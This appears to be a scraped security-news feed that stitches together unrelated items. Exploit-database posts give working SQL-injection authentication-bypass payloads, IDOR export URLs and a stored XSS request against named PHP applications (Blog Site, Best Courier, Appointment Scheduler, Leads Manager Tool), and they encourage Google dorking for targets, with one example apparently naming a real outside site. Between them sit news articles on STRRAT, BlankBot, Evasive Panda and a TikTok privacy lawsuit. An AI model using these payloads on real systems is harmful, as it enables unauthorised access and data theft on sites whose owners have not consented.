Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Blog Site 1.0 Auth By Pass Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1//blog/admin/index.php?page=manage_postGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 SQL Injection

Best Courier Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Best Courier Management System v1.0 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user : 'or''='@gmail.com & pass = 'or''='[+] Panel : http://127.0.0.1/gaatitrack/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Best Courier Management System 1.0 SQL Injection

Appointment Scheduler version 4.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v4.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/AppointmentSchedulerDe/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 4.0 Insecure Direct Object Reference

Organizations in Kazakhstan are the target of a threat activity cluster dubbed Bloody Wolf that delivers a commodity malware called STRRAT (aka Strigoi Master).
"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.
The cyber attacks employ

Network Security / Threat Intelligence

Organizations in Kazakhstan are the target of a threat activity cluster dubbed **Bloody Wolf** that delivers a commodity malware called STRRAT (aka Strigoi Master).

"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.

The cyber attacks employ phishing emails as an initial access vector, impersonating the Ministry of Finance of the Republic of Kazakhstan and other agencies to trick recipients into opening PDF attachments.

The file purports to be a non-compliance notice and contains links to a malicious Java archive (JAR) file as well as an installation guide for the Java interpreter necessary for the malware to function.

In an attempt to lend legitimacy to the attack, the second link points to a web page associated with the country's government website that urges visitors to install Java in order to ensure that the portal is operational.

The STRRAT malware, hosted on a website that mimics the website of the Kazakhstan government ("egov-kz\[.\]online"), sets up persistence on the Windows host by means of a Registry modification and runs the JAR file every 30 minutes.

What's more, a copy of the JAR file is copied to the Windows startup folder to ensure that it automatically launches after a system reboot.

Subsequently, it establishes connections with a Pastebin server to exfiltrate sensitive information from the compromised machine, including details about operating system version and antivirus software installed, and account data from Google Chrome, Mozilla Firefox, Internet Explorer, Foxmail, Outlook, and Thunderbird.

It's also designed to receive additional commands from the server to download and execute more payloads, log keystrokes, run commands using cmd.exe or PowerShell, restart or shut down the system, install a proxy, and remove itself.

"Using less common file types such as JAR enables the attackers to bypass defenses," BI.ZONE said. "Employing legitimate web services such as Pastebin to communicate with the compromised system makes it possible to evade network security solutions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Kazakh Organizations Targeted by 'Bloody Wolf' Cyber Attacks

A list of topics we covered in the week of July 29 to August 4 of 2024

August 2, 2024 - The FBI warns about scammers that impersonate employees of cryptocurrrency exchanges as a means to defraud victims

July 31, 2024 - Meta has settled a Texas lawsuit over gathering biometric data for Facebook's "Tag Suggestions" feature without informed consent.

July 31, 2024 - Apple has released security updates that patch vulnerabilities in Siri and VoiceOver that could be used to access sensitive user data.

July 30, 2024 - Only trust official sources they say, but what happens when a Google vetted ad is for a Google product?

July 29, 2024 - This week on the Lock and Code podcast, we speak with Jess Dodson about SIEM selection, management, and proper data collection.

 A week in security (July 29 &#8211; August 4) 

Cybersecurity researchers have discovered a new Android banking trojan called BlankBot targeting Turkish users with an aim to steal financial information.
"BlankBot features a range of malicious capabilities, which include customer injections, keylogging, screen recording and it communicates with a control server over a WebSocket connection," Intel 471 said in an analysis published last week.

Mobile Security / Financial Security

Cybersecurity researchers have discovered a new Android banking trojan called BlankBot targeting Turkish users with an aim to steal financial information.

"BlankBot features a range of malicious capabilities, which include customer injections, keylogging, screen recording and it communicates with a control server over a WebSocket connection," Intel 471 said in an analysis published last week.

Discovered on July 24, 2024, BlankBot is said to be undergoing active development, with the malware abusing Android's accessibility services permissions to obtain full control over the infected devices.

The names of some of the malicious APK files containing BlankBot are listed below -

*   app-release.apk (com.abcdefg.w568b)
*   app-release.apk (com.abcdef.w568b)
*   app-release-signed (14).apk (com.whatsapp.chma14)
*   app.apk (com.whatsapp.chma14p)
*   app.apk (com.whatsapp.w568bp)
*   showcuu.apk (com.whatsapp.w568b)

Like the recently resurfaced Mandrake Android trojan, BlankBot implements a session-based package installer to circumvent the restricted settings feature introduced in Android 13 to block sideloaded applications from directly requesting dangerous permissions.

"The bot asks the victim to allow installing applications from the third-party sources, then it retrieves the Android package kit (APK) file stored inside the application assets directory with no encryption and proceeds with the package installation process," Intel 471 said.

The malware comes with a wide range of features to perform screen recording, keylogging, and inject overlays based on specific commands received from a remote server to harvest bank account credentials, payment data, and even the pattern used to unlock the device.

BlankBot is also capable of intercepting SMS messages, uninstalling arbitrary applications, and gathering data such as contact lists and installed apps. It further makes use of the accessibility services API to prevent the user from accessing device settings or launching antivirus apps.

"BlankBot is a new Android banking trojan still under development, as evidenced by the multiple code variants observed in different applications," the cybersecurity company said. "Regardless, the malware can perform malicious actions once it infects an Android device."

The disclosure comes as Google outlined the various steps it's taking to combat threat actors' use of cell-site simulators like Stingrays to inject SMS messages directly into Android phones, a fraud technique referred to as SMS Blaster fraud.

"This method to inject messages entirely bypasses the carrier network, thus bypassing all the sophisticated network-based anti-spam and anti-fraud filters," Google said. "SMS Blasters expose a fake LTE or 5G network which executes a single function: downgrading the user's connection to a legacy 2G protocol."

The mitigation measures include a user option to disable 2G at the modem level and turn off null ciphers, the latter of which is an essential configuration for a False Base Station in order to inject an SMS payload.

Earlier this May, Google also said it's stepping up cellular security by alerting users if their cellular network connection is unencrypted and if criminals are using cell-site simulators to snoop on users or send them SMS-based fraud messages.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Android Trojan "BlankBot" Targets Turkish Users' Financial Data

The China-linked threat actor known as Evasive Panda compromised an unnamed internet service provider (ISP) to push malicious software updates to target companies in mid-2023, highlighting a new level of sophistication associated with the group.
Evasive Panda, also known by the names Bronze Highland, Daggerfly, and StormBamboo, is a cyber espionage group that's been active since at least 2012,

Browser Security / Windows Security

The China-linked threat actor known as **Evasive Panda** compromised an unnamed internet service provider (ISP) to push malicious software updates to target companies in mid-2023, highlighting a new level of sophistication associated with the group.

Evasive Panda, also known by the names Bronze Highland, Daggerfly, and StormBamboo, is a cyber espionage group that's been active since at least 2012, leveraging backdoors such as MgBot (aka POCOSTICK) and Nightdoor (aka NetMM and Suzafk) to harvest sensitive information.

More recently, the threat actor was formally attributed to the use of a macOS malware strain called MACMA, which has been observed in the wild as far back as 2021.

"StormBamboo is a highly skilled and aggressive threat actor who compromises third-parties (in this case, an ISP) to breach intended targets," Volexity said in a report published last week.

"The variety of malware employed in various campaigns by this threat actor indicates significant effort is invested, with actively supported payloads for not only macOS and Windows, but also network appliances."

Public reporting from ESET and Symantec over the past two years have documented Evasive Panda's use of MgBot and its track record of orchestrating watering hole and supply chain attacks targeting Tibetan users.

It was also found to have targeted an international non-governmental organization (NGO) in Mainland China with MgBot delivered via update channels of legitimate applications like Tencent QQ.

While it was speculated that the trojanized updates were either the result of a supply chain compromise of Tencent QQ's update servers or a case of an adversary-in-the-middle (AitM) attack, Volexity's analysis confirms it's the latter stemming from a DNS poisoning attack at the ISP level.

Specifically, the threat actor is said to be altering DNS query responses for specific domains tied to automatic software update mechanisms, going after software that used insecure update mechanisms, such as HTTP, or did not enforce adequate integrity checks of the installers.

"It was discovered that StormBamboo poisoned DNS requests to deploy malware via an HTTP automatic update mechanism and poison responses for legitimate hostnames that were used as second-stage, command-and-control (C2) servers," researchers Ankur Saini, Paul Rascagneres, Steven Adair, and Thomas Lancaster said.

The attack chains are fairly straightforward in that the insecure update mechanisms are abused to deliver either MgBot or MACMA depending on the operating system used. Volexity said it notified the concerned ISP to remediate the DNS poisoning attack.

One instance also entailed the deployment of a Google Chrome extension on the victim's macOS device by modifying the Secure Preferences file. The browser add-on purports to be a tool that loads a page in compatibility mode with Internet Explorer, but its main objective is to exfiltrate browser cookies to a Google Drive account controlled by the adversary.

"The attacker can intercept DNS requests and poison them with malicious IP addresses, and then use this technique to abuse automatic update mechanisms that use HTTP rather than HTTPS," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

China-Linked Hackers Compromise ISP to Deploy Malicious Software Updates

The U.S. Department of Justice (DoJ), along with the Federal Trade Commission (FTC), filed a lawsuit against popular video-sharing platform TikTok for "flagrantly violating" children's privacy laws in the country.
The agencies claimed the company knowingly permitted children to create TikTok accounts and to view and share short-form videos and messages with adults and others on the service.
They

Privacy / Data Protection

The U.S. Department of Justice (DoJ), along with the Federal Trade Commission (FTC), filed a lawsuit against popular video-sharing platform TikTok for "flagrantly violating" children's privacy laws in the country.

The agencies claimed the company knowingly permitted children to create TikTok accounts and to view and share short-form videos and messages with adults and others on the service.

They also accused it of illegally collecting and retaining a wide variety of personal information from these children without notifying or obtaining consent from their parents, in contravention of the Children's Online Privacy Protection Act (COPPA).

TikTok's practices also infringed a 2019 consent order between the company and the government in which it pledged to notify parents before collecting children's data and remove videos from users under 13 years old, they added.

COPPA requires online platforms to gather, use, or disclose personal information from children under the age of 13, unless they have obtained consent from their parents. It also mandates companies to delete all the collected information at the parents' request.

"Even for accounts that were created in 'Kids Mode' (a pared-back version of TikTok intended for children under 13), the defendants unlawfully collected and retained children's email addresses and other types of personal information," the DoJ said.

"Further, when parents discovered their children's accounts and asked the defendants to delete the accounts and information in them, the defendants frequently failed to honor those requests."

The complaint further alleged the ByteDance-owned company subjected millions of children under 13 to extensive data collection that enabled targeted advertising and allowed them to interact with adults and access adult content.

It also faulted TikTok for not exercising adequate due diligence during the account creation process by building backdoors that made it possible for children to bypass the age gate aimed at screening those under 13 by letting them sign in using third-party services like Google and Instagram and classifying such accounts as "age unknown" accounts.

"TikTok human reviewers allegedly spent an average of only five to seven seconds reviewing each account to make their determination of whether the account belonged to a child," the FTC said, adding it will take steps to protect children's privacy from firms that deploy "sophisticated digital tools to surveil kids and profit from their data."

TikTok has more than 170 million active users in the U.S. While the company has disputed the allegations, it's the latest setback for the video platform, which is already the subject of a law that would force a sale or a ban of the app by early 2025 because of national security concerns. It has filed a petition in federal court seeking to overturn the ban.

"We disagree with these allegations, many of which relate to past events and practices that are factually inaccurate or have been addressed," TikTok said. "We offer age-appropriate experiences with stringent safeguards, proactively remove suspected underage users, and have voluntarily launched features such as default screen time limits, Family Pairing, and additional privacy protections for minors."

The social media platform has also faced scrutiny globally over child protection. European Union regulators handed TikTok a €345 million fine in September 2023 for violating data protection laws in relation to its handling of children's data. In April 2023, it was fined £12.7 million by the ICO for illegally processing the data of 1.4 million children under 13 who were using its platform without parental consent.

The lawsuit comes as the U.K. Information Commissioner's Office (ICO) revealed it asked 11 media and video-sharing platforms to improve their children's privacy practices or risk facing enforcement action. The names of the offending services were not disclosed.

"Eleven out of the 34 platforms are being asked about issues relating to default privacy settings, geolocation or age assurance, and to explain how their approach conforms with the \[Children's Code\]," it said. "We are also speaking to some of the platforms about targeted advertising to set out expectations for changes to ensure practices are in line with both the law and the code."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DOJ and FTC Sue TikTok for Violating Children's Privacy Laws

Leads Manager Tool suffers from remote SQL injection and cross site scripting vulnerabilities.

    [x]========================================================================================================================================[x] | Title        : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities | Software     : Leads Manager Tool Using PHP and MySQL with Source Code | Create By  : https://www.sourcecodester.com/users/remyandrade | First Release: 25/01/22 | Download     : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html | Date         : 30 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : FREE | Description      : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information[x]========================================================================================================================================[x][O] Exploit    http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]  http://localhost/leads-manager-tool/endpoint/add-leads.php    [O] Proof of concept  [SQL]  Parameter: leads (GET)    Type: boolean-based blind  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl  Type: error-based  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls  Type: stacked queries  Title: MySQL >= 5.0.12 stacked queries (comment)  Payload: leads= --emurate';SELECT SLEEP(5)#  Type: time-based blind  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt    [XSS]    POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1  Host: 127.0.0.1  Accept-Encoding: gzip, deflate, br  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  Accept-Language: en-US;q=0.9,en;q=0.8  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  Connection: close  Cache-Control: max-age=0  Origin: http://127.0.0.1  Upgrade-Insecure-Requests: 1  Referer: http://127.0.0.1/leads-manager-tool/  Content-Type: application/x-www-form-urlencoded  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"  Sec-CH-UA-Platform: Windows  Sec-CH-UA-Mobile: ?0  Content-Length: 85  leads_name=Vrs<script>alert(1)</script>Hck&email_add=vrs-hck@maho.id&phone_number=911-911-9111    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Leads Manager Tool SQL Injection / Cross Site Scripting

Appointment Scheduler version 3.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v3.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/www/ wongkit.com.hk/appointment/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#google